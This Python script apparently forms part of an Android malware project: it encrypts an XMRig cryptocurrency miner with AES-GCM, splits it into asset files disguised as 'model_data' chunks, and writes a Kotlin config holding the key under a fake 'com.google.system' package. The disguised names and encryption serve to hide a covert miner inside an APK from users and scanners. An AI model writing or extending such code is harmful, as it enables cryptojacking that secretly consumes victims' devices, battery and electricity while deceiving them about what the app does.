#!/usr/bin/env python3
"""
Usage: python prepare_miner.py [xmrig_elf_path]

AES-256-GCM encrypts XMRig binary, splits into 4 asset chunks,
generates MinerConfig.kt with AES key.
If no binary given, generates random placeholder chunks.
"""
import sys, os
from pathlib import Path

try:
    from Crypto.Cipher import AES
except ImportError:
    os.system(f"{sys.executable} -m pip install pycryptodome -q")
    from Crypto.Cipher import AES

ASSETS_DIR = Path("app/src/main/assets")
CHUNK_NAMES = ["model_data_0.bin", "model_data_1.bin", "model_data_2.bin", "model_data_3.bin"]
NUM_CHUNKS = 4
CONFIG_DEST = Path("app/src/main/java/com/google/system/MinerConfig.kt")

def encrypt_and_split(binary_path: str) -> bytes:
    data = Path(binary_path).read_bytes()
    key = os.urandom(32)
    cipher = AES.new(key, AES.MODE_GCM)
    ct, tag = cipher.encrypt_and_digest(data)
    blob = cipher.nonce + tag + ct

    chunk_size = (len(blob) + NUM_CHUNKS - 1) // NUM_CHUNKS
    chunks = [blob[i:i+chunk_size] for i in range(0, len(blob), chunk_size)]
    while len(chunks) < NUM_CHUNKS:
        chunks.append(b'')

    ASSETS_DIR.mkdir(parents=True, exist_ok=True)
    for name, chunk in zip(CHUNK_NAMES, chunks):
        (ASSETS_DIR / name).write_bytes(chunk)

    total = sum(len(c) for c in chunks)
    print(f"Wrote {len(chunks)} chunks ({total} bytes) to {ASSETS_DIR}/")
    return key

def generate_placeholders() -> bytes:
    key = os.urandom(32)
    filler = os.urandom(4 * 1024 * 1024)
    cipher = AES.new(key, AES.MODE_GCM)
    ct, tag = cipher.encrypt_and_digest(filler)
    blob = cipher.nonce + tag + ct

    chunk_size = (len(blob) + NUM_CHUNKS - 1) // NUM_CHUNKS
    chunks = [blob[i:i+chunk_size] for i in range(0, len(blob), chunk_size)]
    while len(chunks) < NUM_CHUNKS:
        chunks.append(b'')

    ASSETS_DIR.mkdir(parents=True, exist_ok=True)
    for name, chunk in zip(CHUNK_NAMES, chunks):
        (ASSETS_DIR / name).write_bytes(chunk)

    total = sum(len(c) for c in chunks)
    print(f"[placeholder] Wrote {total} bytes to {ASSETS_DIR}/")
    return key

def generate_config(key: bytes):
    key_str = ",".join(f"({b & 0xff}).toByte()" for b in key)
    kotlin = f"""// Auto-generated by prepare_miner.py
package com.google.system

object MinerConfig {{
    val MINER_AES_KEY: ByteArray = byteArrayOf({key_str})
    val MINER_CHUNK_NAMES: Array<String> = arrayOf({",".join(f'"{n}"' for n in CHUNK_NAMES)})
}}
"""
    CONFIG_DEST.parent.mkdir(parents=True, exist_ok=True)
    CONFIG_DEST.write_text(kotlin)
    print(f"Wrote {CONFIG_DEST}")

def main():
    binary = sys.argv[1] if len(sys.argv) > 1 else None
    if binary and Path(binary).exists():
        print(f"Encrypting: {binary} ({Path(binary).stat().st_size} bytes)")
        key = encrypt_and_split(binary)
    else:
        print("No binary — generating placeholder chunks")
        key = generate_placeholders()
    generate_config(key)
    print("=" * 50)
    print("Done. Rebuild the APK.")
    print(f"Replace with real XMRig: python {__file__} /path/to/xmrig")

if __name__ == "__main__":
    main()
